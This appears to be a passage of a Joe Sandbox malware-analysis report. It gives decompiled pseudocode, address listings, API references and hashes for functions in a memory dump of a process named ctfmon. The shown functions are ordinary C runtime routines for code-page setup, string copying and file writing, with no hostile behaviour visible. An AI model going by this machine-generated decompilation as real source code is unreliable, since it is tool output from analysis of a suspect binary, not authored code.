                                                0x0097ad35
                                                0x0097ad3b
                                                0x00000000
                                                0x0097ad41
                                                0x0097ad45
                                                0x0097ad4b
                                                0x0097ad4d
                                                0x00000000
                                                0x0097ad53
                                                0x0097ad58
                                                0x0097ad5e
                                                0x0097ad60
                                                0x0097adea
                                                0x0097adf0
                                                0x00000000
                                                0x0097adf2
                                                0x0097adf3
                                                0x00000000
                                                0x0097adf3
                                                0x0097ad66
                                                0x0097ad70
                                                0x0097ad75
                                                0x0097ad7d
                                                0x0097ad83
                                                0x0097ad84
                                                0x0097ad87
                                                0x0097adda
                                                0x0097ad89
                                                0x0097ad89
                                                0x0097ad8d
                                                0x0097ad90
                                                0x0097ad92
                                                0x0097ad92
                                                0x0097ad95
                                                0x0097ad97
                                                0x00000000
                                                0x00000000
                                                0x0097ad99
                                                0x0097ad9c
                                                0x0097ada7
                                                0x0097ada7
                                                0x0097ada9
                                                0x00000000
                                                0x00000000
                                                0x0097ada1
                                                0x0097ada6
                                                0x0097ada6
                                                0x0097ada6
                                                0x0097adab
                                                0x0097adae
                                                0x0097adb1
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0097adb1
                                                0x0097ad92
                                                0x0097adb3
                                                0x0097adb3
                                                0x0097adb6
                                                0x0097adbb
                                                0x0097adbb
                                                0x0097adbe
                                                0x0097adbf
                                                0x0097adbf
                                                0x0097adbf
                                                0x0097adcf
                                                0x0097add5
                                                0x0097add5
                                                0x0097addf
                                                0x0097ade2
                                                0x0097ade3
                                                0x0097ade4
                                                0x0097aea8
                                                0x0097aea9
                                                0x0097aeae
                                                0x0097aeaf
                                                0x0097aeaf
                                                0x0097ad60
                                                0x0097ad4d
                                                0x0097ad3b
                                                0x0097ad2f
                                                0x00000000
                                                0x0097aeb1
                                                0x0097ae0f
                                                0x0097ae17
                                                0x0097ae17
                                                0x0097ae1b
                                                0x0097ae1e
                                                0x0097ae24
                                                0x0097ae27
                                                0x0097ae27
                                                0x0097ae2a
                                                0x0097ae2c
                                                0x0097ae2e
                                                0x0097ae2e
                                                0x0097ae31
                                                0x0097ae33
                                                0x00000000
                                                0x00000000
                                                0x0097ae35
                                                0x0097ae38
                                                0x0097ae54
                                                0x0097ae54
                                                0x0097ae56
                                                0x00000000
                                                0x00000000
                                                0x0097ae3d
                                                0x0097ae43
                                                0x0097ae45
                                                0x0097ae4b
                                                0x0097ae4f
                                                0x0097ae4f
                                                0x0097ae50
                                                0x00000000
                                                0x0097ae50
                                                0x00000000
                                                0x0097ae43
                                                0x0097ae58
                                                0x0097ae5b
                                                0x0097ae5e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0097ae5e
                                                0x0097ae60
                                                0x0097ae60
                                                0x0097ae63
                                                0x0097ae64
                                                0x0097ae67
                                                0x0097ae6a
                                                0x0097ae6a
                                                0x0097ae70
                                                0x0097ae73
                                                0x0097ae82
                                                0x0097ae8b
                                                0x0097ae90
                                                0x0097ae96
                                                0x0097ae97
                                                0x0097ae97
                                                0x0097ae9a
                                                0x0097ae9d
                                                0x0097aea0
                                                0x0097aea3
                                                0x0097aea3
                                                0x0097aea3
                                                0x00000000
                                                0x0097acf7
                                                0x0097acf8
                                                0x0097acfe
                                                0x0097aeb2
                                                0x0097aec1

                                                APIs
                                                  • Part of subcall function 0097A8A4: GetOEMCP.KERNEL32(00000000,?,?,0097AB2D,?), ref: 0097A8CF
                                                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0097AB72,?,00000000), ref: 0097AD45
                                                • GetCPInfo.KERNEL32(00000000,0097AB72,?,?,?,0097AB72,?,00000000), ref: 0097AD58
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: CodeInfoPageValid
                                                • String ID: /LU5/
                                                • API String ID: 546120528-937868281
                                                • Opcode ID: 85edcd2bdfb2b28d6b1916e30c3ab424558ff74e2b5e2cbe0ddd2db8493e4046
                                                • Instruction ID: 5b28e5f2ebf7c397530f1678f4ad60f42a349023c4b447ee3afeedfe1dfc2be3
                                                • Opcode Fuzzy Hash: 85edcd2bdfb2b28d6b1916e30c3ab424558ff74e2b5e2cbe0ddd2db8493e4046
                                                • Instruction Fuzzy Hash: 945133729042459EDB248F35C8857BFBBE8EFC1310F14C46ED09E8B691E7389946CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0097A97C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 96%
                                                			E0097A97C(void* __ebx, signed int __edx, void* __edi, intOrPtr _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				intOrPtr _v1824;
				signed int _v1828;
				void* __esi;
				signed int _t63;
				void* _t67;
				signed int _t68;
				intOrPtr _t69;
				void* _t72;
				char _t73;
				char _t74;
				signed char _t75;
				signed int _t76;
				signed char _t86;
				char _t87;
				char _t90;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				void* _t96;
				char* _t97;
				intOrPtr _t100;
				signed int _t101;

				_t95 = __edx;
				_t63 =  *0x98f008; // 0x35554c2f
				_v8 = _t63 ^ _t101;
				_t100 = _a4;
				_t4 = _t100 + 4; // 0x5efc4d8b
				if(GetCPInfo( *_t4,  &_v1820) == 0) {
					_t47 = _t100 + 0x119; // 0x97afc7
					_t96 = _t47;
					_t90 = 0;
					_t67 = 0xffffff9f;
					_t68 = _t67 - _t96;
					__eflags = _t68;
					_v1828 = _t68;
					do {
						_t97 = _t96 + _t90;
						_t69 = _t68 + _t97;
						_v1824 = _t69;
						__eflags = _t69 + 0x20 - 0x19;
						if(_t69 + 0x20 > 0x19) {
							__eflags = _v1824 - 0x19;
							if(_v1824 > 0x19) {
								 *_t97 = 0;
							} else {
								_t72 = _t100 + _t90;
								_t57 = _t72 + 0x19;
								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
								__eflags =  *_t57;
								_t59 = _t90 - 0x20; // -32
								_t73 = _t59;
								goto L24;
							}
						} else {
							 *(_t100 + _t90 + 0x19) =  *(_t100 + _t90 + 0x19) | 0x00000010;
							_t54 = _t90 + 0x20; // 0x20
							_t73 = _t54;
							L24:
							 *_t97 = _t73;
						}
						_t68 = _v1828;
						_t61 = _t100 + 0x119; // 0x97afc7
						_t96 = _t61;
						_t90 = _t90 + 1;
						__eflags = _t90 - 0x100;
					} while (_t90 < 0x100);
				} else {
					_t74 = 0;
					do {
						 *((char*)(_t101 + _t74 - 0x104)) = _t74;
						_t74 = _t74 + 1;
					} while (_t74 < 0x100);
					_t75 = _v1814;
					_t93 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t107 = _t75;
						if(_t75 == 0) {
							break;
						}
						_t95 =  *(_t93 + 1) & 0x000000ff;
						_t76 = _t75 & 0x000000ff;
						while(1) {
							__eflags = _t76 - _t95;
							if(_t76 > _t95) {
								break;
							}
							__eflags = _t76 - 0x100;
							if(_t76 < 0x100) {
								 *((char*)(_t101 + _t76 - 0x104)) = 0x20;
								_t76 = _t76 + 1;
								__eflags = _t76;
								continue;
							}
							break;
						}
						_t93 = _t93 + 2;
						__eflags = _t93;
						_t75 =  *_t93;
					}
					_t13 = _t100 + 4; // 0x5efc4d8b
					E0097C425(0, _t95, 0x100, _t107, 0, 1,  &_v264, 0x100,  &_v1800,  *_t13, 0);
					_t16 = _t100 + 4; // 0x5efc4d8b
					_t19 = _t100 + 0x21c; // 0x75009962
					E0097A62C(0x100, _t107, 0,  *_t19, 0x100,  &_v264, 0x100,  &_v520, 0x100,  *_t16, 0);
					_t21 = _t100 + 4; // 0x5efc4d8b
					_t23 = _t100 + 0x21c; // 0x75009962
					E0097A62C(0x100, _t107, 0,  *_t23, 0x200,  &_v264, 0x100,  &_v776, 0x100,  *_t21, 0);
					_t94 = 0;
					do {
						_t86 =  *(_t101 + _t94 * 2 - 0x704) & 0x0000ffff;
						if((_t86 & 0x00000001) == 0) {
							__eflags = _t86 & 0x00000002;
							if((_t86 & 0x00000002) == 0) {
								 *((char*)(_t100 + _t94 + 0x119)) = 0;
							} else {
								_t37 = _t100 + _t94 + 0x19;
								 *_t37 =  *(_t100 + _t94 + 0x19) | 0x00000020;
								__eflags =  *_t37;
								_t87 =  *((intOrPtr*)(_t101 + _t94 - 0x304));
								goto L15;
							}
						} else {
							 *(_t100 + _t94 + 0x19) =  *(_t100 + _t94 + 0x19) | 0x00000010;
							_t87 =  *((intOrPtr*)(_t101 + _t94 - 0x204));
							L15:
							 *((char*)(_t100 + _t94 + 0x119)) = _t87;
						}
						_t94 = _t94 + 1;
					} while (_t94 < 0x100);
				}
				return E00970A5D(_v8 ^ _t101, _t100);
			}
































                                                0x0097a97c
                                                0x0097a987
                                                0x0097a98e
                                                0x0097a993
                                                0x0097a99e
                                                0x0097a9b0
                                                0x0097aaa8
                                                0x0097aaa8
                                                0x0097aaae
                                                0x0097aab0
                                                0x0097aab1
                                                0x0097aab1
                                                0x0097aab3
                                                0x0097aab9
                                                0x0097aab9
                                                0x0097aabb
                                                0x0097aabd
                                                0x0097aac6
                                                0x0097aac9
                                                0x0097aad5
                                                0x0097aadc
                                                0x0097aaec
                                                0x0097aade
                                                0x0097aade
                                                0x0097aae1
                                                0x0097aae1
                                                0x0097aae1
                                                0x0097aae5
                                                0x0097aae5
                                                0x00000000
                                                0x0097aae5
                                                0x0097aacb
                                                0x0097aacb
                                                0x0097aad0
                                                0x0097aad0
                                                0x0097aae8
                                                0x0097aae8
                                                0x0097aae8
                                                0x0097aaee
                                                0x0097aaf4
                                                0x0097aaf4
                                                0x0097aafa
                                                0x0097aafb
                                                0x0097aafb
                                                0x0097a9b6
                                                0x0097a9b6
                                                0x0097a9b8
                                                0x0097a9b8
                                                0x0097a9bf
                                                0x0097a9c0
                                                0x0097a9c4
                                                0x0097a9ca
                                                0x0097a9d0
                                                0x0097a9f8
                                                0x0097a9f8
                                                0x0097a9fa
                                                0x00000000
                                                0x00000000
                                                0x0097a9d9
                                                0x0097a9dd
                                                0x0097a9ef
                                                0x0097a9ef
                                                0x0097a9f1
                                                0x00000000
                                                0x00000000
                                                0x0097a9e2
                                                0x0097a9e4
                                                0x0097a9e6
                                                0x0097a9ee
                                                0x0097a9ee
                                                0x00000000
                                                0x0097a9ee
                                                0x00000000
                                                0x0097a9e4
                                                0x0097a9f3
                                                0x0097a9f3
                                                0x0097a9f6
                                                0x0097a9f6
                                                0x0097a9fd
                                                0x0097aa12
                                                0x0097aa18
                                                0x0097aa2c
                                                0x0097aa33
                                                0x0097aa42
                                                0x0097aa54
                                                0x0097aa5b
                                                0x0097aa63
                                                0x0097aa65
                                                0x0097aa65
                                                0x0097aa6f
                                                0x0097aa7f
                                                0x0097aa81
                                                0x0097aa98
                                                0x0097aa83
                                                0x0097aa83
                                                0x0097aa83
                                                0x0097aa83
                                                0x0097aa88
                                                0x00000000
                                                0x0097aa88
                                                0x0097aa71
                                                0x0097aa71
                                                0x0097aa76
                                                0x0097aa8f
                                                0x0097aa8f
                                                0x0097aa8f
                                                0x0097aa9f
                                                0x0097aaa0
                                                0x0097aaa4
                                                0x0097ab0f

                                                APIs
                                                • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0097A9A1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: Info
                                                • String ID: $/LU5/
                                                • API String ID: 1807457897-1059646758
                                                • Opcode ID: 065f83a755754bf18edc281e0a7df4273529c04731a3cd5d1d244ebb14e962b6
                                                • Instruction ID: 06544f38557d8bb14f87c8e3ded85d9b3b3c5a0aa293591b1200a06fc8b346e2
                                                • Opcode Fuzzy Hash: 065f83a755754bf18edc281e0a7df4273529c04731a3cd5d1d244ebb14e962b6
                                                • Instruction Fuzzy Hash: EB415B725083489EDF258E248D84BFEBBEEEB85304F1444EDE58E86142E2359E45DF61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00969B40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 97%
                                                			E00969B40(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* __edi;
				void* __esi;
				signed int _t47;
				intOrPtr _t48;
				char _t50;
				intOrPtr _t54;
				void* _t55;
				intOrPtr _t57;
				char _t59;
				intOrPtr _t63;
				void* _t64;
				void* _t66;
				intOrPtr _t67;
				intOrPtr* _t69;
				void* _t73;
				intOrPtr* _t76;
				void* _t80;
				void* _t84;
				void* _t85;
				intOrPtr* _t86;
				intOrPtr* _t87;
				signed int _t88;
				intOrPtr _t89;
				signed int _t90;
				intOrPtr _t91;
				void* _t92;

				_t47 = 0;
				_v12 = __edx;
				_t66 = __ecx;
				_v8 = 0;
				asm("o16 nop [eax+eax]");
				while(1) {
					_t3 = _t47 + 0x994e80; // 0x994e80
					_t86 = _t3;
					if(_t86 == 0) {
						break;
					} else {
						_t76 = _t86;
						_t4 = _t76 + 1; // 0x994e81
						_t85 = _t4;
						goto L3;
					}
					do {
						L3:
						_t57 =  *_t76;
						_t76 = _t76 + 1;
					} while (_t57 != 0);
					if(_t76 == _t85) {
						break;
					}
					_t90 = 0;
					if( *(_t66 + 0x20) <= 0) {
						L10:
						_t91 = E00970A6E(_t90, _t99, 0x100);
						_t92 = _t92 + 4;
						_v16 = _t91;
						_t80 = _t91 - _v8 - 0x994e80;
						do {
							_t59 =  *_t86;
							_t86 = _t86 + 1;
							 *((char*)(_t80 + _t86 - 1)) = _t59;
						} while (_t59 != 0);
						if(E00966F70(_t66) != 0) {
							_t16 = _t66 + 0x20; // 0x4d005c
							_t17 = _t66 + 0x1c; // 0x610074
							 *((intOrPtr*)( *_t17 +  *_t16 * 4)) = _t91;
							 *(_t66 + 0x20) =  *(_t66 + 0x20) + 1;
						}
						L14:
						_t47 = _v8 - 0xffffff80;
						_v8 = _t47;
						if(_t47 < 0x600) {
							continue;
						}
						break;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t63 = 0;
						_t6 = _t66 + 0x20; // 0x4d005c
						if(_t90 <  *_t6) {
							_t7 = _t66 + 0x1c; // 0x610074
							_t63 =  *((intOrPtr*)( *_t7 + _t90 * 4));
						}
						_t64 = E00977612(_t86, _t90, _t63, _t86);
						_t92 = _t92 + 8;
						if(_t64 == 0) {
							goto L14;
						}
						_t90 = _t90 + 1;
						_t10 = _t66 + 0x20; // 0x4d005c
						_t99 = _t90 -  *_t10;
						if(_t90 <  *_t10) {
							continue;
						}
						goto L10;
					}
					goto L14;
				}
				_t67 = _v12;
				_t48 = 0;
				_v8 = 0;
				asm("o16 nop [eax+eax]");
				while(1) {
					_t26 = _t48 + "123"; // 0x990e80
					_t87 = _t26;
					if(_t87 == 0) {
						break;
					}
					_t69 = _t87;
					_t27 = _t69 + 1; // 0x990e81
					_t84 = _t27;
					do {
						_t48 =  *_t69;
						_t69 = _t69 + 1;
					} while (_t48 != 0);
					if(_t69 == _t84) {
						break;
					}
					_t88 = 0;
					if( *(_t67 + 0x20) <= 0) {
						L25:
						_t89 = E00970A6E(_t88, _t111, 0x100);
						_t92 = _t92 + 4;
						_v16 = _t89;
						_t73 = _t89 - _v8 - "123";
						do {
							_t50 =  *_t87;
							_t36 = _t87 + 1; // 0x3332
							_t87 = _t36;
							 *((char*)(_t73 + _t87 - 1)) = _t50;
						} while (_t50 != 0);
						if(E00966F70(_t67) != 0) {
							 *((intOrPtr*)( *((intOrPtr*)(_t67 + 0x1c)) +  *(_t67 + 0x20) * 4)) = _t89;
							 *(_t67 + 0x20) =  *(_t67 + 0x20) + 1;
						}
						L29:
						_t48 = _v8 - 0xffffff80;
						_v8 = _t48;
						if(_t48 < 0x4000) {
							continue;
						}
						break;
					} else {
						goto L21;
					}
					while(1) {
						L21:
						_t54 = 0;
						if(_t88 <  *(_t67 + 0x20)) {
							_t54 =  *((intOrPtr*)( *((intOrPtr*)(_t67 + 0x1c)) + _t88 * 4));
						}
						_t55 = E00977612(_t87, _t88, _t54, _t87);
						_t92 = _t92 + 8;
						if(_t55 == 0) {
							goto L29;
						}
						_t88 = _t88 + 1;
						_t111 = _t88 -  *(_t67 + 0x20);
						if(_t88 <  *(_t67 + 0x20)) {
							continue;
						}
						goto L25;
					}
					goto L29;
				}
				return _t48;
			}
































                                                0x00969b48
                                                0x00969b4a
                                                0x00969b4e
                                                0x00969b50
                                                0x00969b57
                                                0x00969b60
                                                0x00969b60
                                                0x00969b60
                                                0x00969b68
                                                0x00000000
                                                0x00969b6e
                                                0x00969b6e
                                                0x00969b70
                                                0x00969b70
                                                0x00969b70
                                                0x00969b70
                                                0x00969b73
                                                0x00969b73
                                                0x00969b73
                                                0x00969b75
                                                0x00969b76
                                                0x00969b7c
                                                0x00000000
                                                0x00000000
                                                0x00969b7e
                                                0x00969b83
                                                0x00969ba6
                                                0x00969bb0
                                                0x00969bb2
                                                0x00969bb7
                                                0x00969bbd
                                                0x00969bc3
                                                0x00969bc3
                                                0x00969bc5
                                                0x00969bc8
                                                0x00969bcc
                                                0x00969bd9
                                                0x00969bdb
                                                0x00969bde
                                                0x00969be1
                                                0x00969be4
                                                0x00969be4
                                                0x00969be7
                                                0x00969bea
                                                0x00969bed
                                                0x00969bf5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00969b85
                                                0x00969b85
                                                0x00969b85
                                                0x00969b87
                                                0x00969b8a
                                                0x00969b8c
                                                0x00969b8f
                                                0x00969b8f
                                                0x00969b94
                                                0x00969b99
                                                0x00969b9e
                                                0x00000000
                                                0x00000000
                                                0x00969ba0
                                                0x00969ba1
                                                0x00969ba1
                                                0x00969ba4
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00969ba4
                                                0x00000000
                                                0x00969b85
                                                0x00969bfb
                                                0x00969bfe
                                                0x00969c00
                                                0x00969c07
                                                0x00969c10
                                                0x00969c10
                                                0x00969c10
                                                0x00969c18
                                                0x00000000
                                                0x00000000
                                                0x00969c1e
                                                0x00969c20
                                                0x00969c20
                                                0x00969c23
                                                0x00969c23
                                                0x00969c25
                                                0x00969c26
                                                0x00969c2c
                                                0x00000000
                                                0x00000000
                                                0x00969c2e
                                                0x00969c33
                                                0x00969c56
                                                0x00969c60
                                                0x00969c62
                                                0x00969c67
                                                0x00969c6d
                                                0x00969c73
                                                0x00969c73
                                                0x00969c75
                                                0x00969c75
                                                0x00969c78
                                                0x00969c7c
                                                0x00969c89
                                                0x00969c91
                                                0x00969c94
                                                0x00969c94
                                                0x00969c97
                                                0x00969c9a
                                                0x00969c9d
                                                0x00969ca5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00969c35
                                                0x00969c35
                                                0x00969c35
                                                0x00969c3a
                                                0x00969c3f
                                                0x00969c3f
                                                0x00969c44
                                                0x00969c49
                                                0x00969c4e
                                                0x00000000
                                                0x00000000
                                                0x00969c50
                                                0x00969c51
                                                0x00969c54
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00969c54
                                                0x00000000
                                                0x00969c35
                                                0x00969cb1

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 123
                                                • API String ID: 0-2286445522
                                                • Opcode ID: 31f67348ef967b9dc3e7fde903b058c7bcee3be9f03606870bfe7a0fbb18c808
                                                • Instruction ID: 75d1465f280148efca46cbe10c06d21ea68a55ef5be09e0df8065ac2eddc718c
                                                • Opcode Fuzzy Hash: 31f67348ef967b9dc3e7fde903b058c7bcee3be9f03606870bfe7a0fbb18c808
                                                • Instruction Fuzzy Hash: 7241F571904205DFCF14DF78A084AA9B7B9FF89304B1646E9DC89AF34AD635E902CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0097D4B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81fileCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 81%
                                                			E0097D4B7(void* __ebx, void* __edi, intOrPtr* _a4, signed int _a8, signed short* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v10;
				void _v5128;
				intOrPtr _v5132;
				long _v5136;
				void* _v5140;
				void* __esi;
				signed int _t29;
				intOrPtr _t35;
				long _t43;
				signed int _t44;
				signed short* _t47;
				signed int _t49;
				signed int _t51;
				void* _t52;
				signed int _t56;
				signed int* _t58;
				long _t60;
				intOrPtr* _t63;
				void* _t64;
				signed int _t65;

				E00983CA0();
				_t29 =  *0x98f008; // 0x35554c2f
				_v8 = _t29 ^ _t65;
				_t49 = _a8;
				_t51 = (_t49 & 0x0000003f) * 0x30;
				_t47 = _a12;
				_t63 = _a4;
				_t8 = _t51 + 0x18; // 0xcccccccc
				_t52 =  *( *((intOrPtr*)(0x996480 + (_t49 >> 6) * 4)) + _t8);
				_t35 = _a16 + _t47;
				_v5140 = _t52;
				_v5132 = _t35;
				 *_t63 = 0;
				 *((intOrPtr*)(_t63 + 4)) = 0;
				 *((intOrPtr*)(_t63 + 8)) = 0;
				while(_t47 < _t35) {
					_t58 =  &_v5128;
					while(_t47 < _t35) {
						_t44 =  *_t47 & 0x0000ffff;
						_t47 =  &(_t47[1]);
						if(_t44 == 0xa) {
							 *((intOrPtr*)(_t63 + 8)) =  *((intOrPtr*)(_t63 + 8)) + 2;
							_t56 = 0xd;
							 *_t58 = _t56;
							_t58 =  &(_t58[0]);
						}
						 *_t58 = _t44;
						_t58 =  &(_t58[0]);
						_t35 = _v5132;
						if(_t58 <  &_v10) {
							continue;
						}
						break;
					}
					_t60 = _t58 -  &_v5128 & 0xfffffffe;
					if(WriteFile(_t52,  &_v5128, _t60,  &_v5136, 0) == 0) {
						 *_t63 = GetLastError();
					} else {
						_t43 = _v5136;
						 *((intOrPtr*)(_t63 + 4)) =  *((intOrPtr*)(_t63 + 4)) + _t43;
						if(_t43 >= _t60) {
							_t35 = _v5132;
							_t52 = _v5140;
							continue;
						}
					}
					L12:
					_pop(_t64);
					return E00970A5D(_v8 ^ _t65, _t64);
				}
				goto L12;
			}
























                                                0x0097d4c1
                                                0x0097d4c6
                                                0x0097d4cd
                                                0x0097d4d0
                                                0x0097d4db
                                                0x0097d4df
                                                0x0097d4ea
                                                0x0097d4ee
                                                0x0097d4ee
                                                0x0097d4f5
                                                0x0097d4f7
                                                0x0097d4ff
                                                0x0097d505
                                                0x0097d507
                                                0x0097d50a
                                                0x0097d584
                                                0x0097d50f
                                                0x0097d515
                                                0x0097d519
                                                0x0097d51c
                                                0x0097d522
                                                0x0097d524
                                                0x0097d52a
                                                0x0097d52b
                                                0x0097d52e
                                                0x0097d52e
                                                0x0097d531
                                                0x0097d537
                                                0x0097d53c
                                                0x0097d542
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0097d542
                                                0x0097d555
                                                0x0097d569
                                                0x0097d590
                                                0x0097d56b
                                                0x0097d56b
                                                0x0097d571
                                                0x0097d576
                                                0x0097d578
                                                0x0097d57e
                                                0x00000000
                                                0x0097d57e
                                                0x0097d576
                                                0x0097d592
                                                0x0097d598
                                                0x0097d5a4
                                                0x0097d5a4
                                                0x00000000

                                                APIs
                                                • WriteFile.KERNEL32(CCCCCCCC,?,?,?,00000000,00000010,0096971E,08A10000,?,0097D8F4,00000000,0096971E,00000010,0096971E,0096971E,?), ref: 0097D561
                                                • GetLastError.KERNEL32(?,0097D8F4,00000000,0096971E,00000010,0096971E,0096971E,?,0096971E,?,00975E64,0096971E,?,00000000,?,00975EFD), ref: 0097D58A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastWrite
                                                • String ID: /LU5/
                                                • API String ID: 442123175-937868281
                                                • Opcode ID: 6fca900884882141ed7e9e5fd7443abd8bb4ae69bbbe11c0ca36cca86567df10
                                                • Instruction ID: 61b2ac25ef6b9fe3eb407ca0b3dedb8a37149796c081d01fe58c9a8a06a50dac
                                                • Opcode Fuzzy Hash: 6fca900884882141ed7e9e5fd7443abd8bb4ae69bbbe11c0ca36cca86567df10
                                                • Instruction Fuzzy Hash: D9317172A112199BCB24CF69CC80A99B3F9FF88314B1084AAE51DD7250E630AD858F54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0097D3D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77fileCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 81%
                                                			E0097D3D8(void* __ebx, void* __edi, signed int* _a4, signed int _a8, intOrPtr* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v9;
				void _v5128;
				intOrPtr _v5132;
				long _v5136;
				void* _v5140;
				void* __esi;
				signed int _t31;
				intOrPtr _t37;
				long _t45;
				char _t46;
				intOrPtr* _t49;
				signed int _t51;
				signed int _t53;
				void* _t54;
				char* _t58;
				long _t59;
				signed int* _t62;
				void* _t63;
				signed int _t64;

				E00983CA0();
				_t31 =  *0x98f008; // 0x35554c2f
				_v8 = _t31 ^ _t64;
				_t51 = _a8;
				_t53 = (_t51 & 0x0000003f) * 0x30;
				_t49 = _a12;
				_t62 = _a4;
				_t8 = _t53 + 0x18; // 0xcccccccc
				_t54 =  *( *((intOrPtr*)(0x996480 + (_t51 >> 6) * 4)) + _t8);
				 *_t62 =  *_t62 & 0x00000000;
				_t37 = _a16 + _t49;
				_t62[1] = _t62[1] & 0x00000000;
				_t62[2] = _t62[2] & 0x00000000;
				_v5140 = _t54;
				_v5132 = _t37;
				while(_t49 < _t37) {
					_t58 =  &_v5128;
					while(_t49 < _t37) {
						_t46 =  *_t49;
						_t49 = _t49 + 1;
						if(_t46 == 0xa) {
							_t62[2] = _t62[2] + 1;
							 *_t58 = 0xd;
							_t58 = _t58 + 1;
						}
						 *_t58 = _t46;
						_t58 = _t58 + 1;
						_t37 = _v5132;
						if(_t58 <  &_v9) {
							continue;
						}
						break;
					}
					_t59 = _t58 -  &_v5128;
					if(WriteFile(_t54,  &_v5128, _t59,  &_v5136, 0) == 0) {
						 *_t62 = GetLastError();
					} else {
						_t45 = _v5136;
						_t62[1] = _t62[1] + _t45;
						if(_t45 >= _t59) {
							_t37 = _v5132;
							_t54 = _v5140;
							continue;
						}
					}
					L12:
					_pop(_t63);
					return E00970A5D(_v8 ^ _t64, _t63);
				}
				goto L12;
			}























                                                0x0097d3e2
                                                0x0097d3e7
                                                0x0097d3ee
                                                0x0097d3f1
                                                0x0097d3fc
                                                0x0097d400
                                                0x0097d40b
                                                0x0097d40f
                                                0x0097d40f
                                                0x0097d416
                                                0x0097d419
                                                0x0097d41b
                                                0x0097d41f
                                                0x0097d423
                                                0x0097d429
                                                0x0097d496
                                                0x0097d431
                                                0x0097d437
                                                0x0097d43b
                                                0x0097d43d
                                                0x0097d440
                                                0x0097d442
                                                0x0097d445
                                                0x0097d448
                                                0x0097d448
                                                0x0097d449
                                                0x0097d44e
                                                0x0097d451
                                                0x0097d457
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0097d457
                                                0x0097d45f
                                                0x0097d47b
                                                0x0097d4a2
                                                0x0097d47d
                                                0x0097d47d
                                                0x0097d483
                                                0x0097d488
                                                0x0097d48a
                                                0x0097d490
                                                0x00000000
                                                0x0097d490
                                                0x0097d488
                                                0x0097d4a4
                                                0x0097d4aa
                                                0x0097d4b6
                                                0x0097d4b6
                                                0x00000000

                                                APIs
                                                • WriteFile.KERNEL32(CCCCCCCC,?,?,?,00000000,00000010,0096971E,08A10000,?,0097D914,00000000,0096971E,00000010,0096971E,0096971E,?), ref: 0097D473
                                                • GetLastError.KERNEL32(?,0097D914,00000000,0096971E,00000010,0096971E,0096971E,?,0096971E,?,00975E64,0096971E,?,00000000,?,00975EFD), ref: 0097D49C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastWrite
                                                • String ID: /LU5/
                                                • API String ID: 442123175-937868281
                                                • Opcode ID: 62b5f8c69efecdbaed32b8fffb6b0f204d04ce94b3a907cc0e98e30f45487b23
                                                • Instruction ID: d26e7d256f9ba4f33aa68c728292aeead7741a9ae502f9995c319c7bb1802fbb
                                                • Opcode Fuzzy Hash: 62b5f8c69efecdbaed32b8fffb6b0f204d04ce94b3a907cc0e98e30f45487b23
                                                • Instruction Fuzzy Hash: DA218076A102199FCB14CF69C880BE9B3F9FF48351F1044AAE54ED72A1D630AD85CF20
                                                Uniqueness

                                                Uniqueness Score: -1.00%

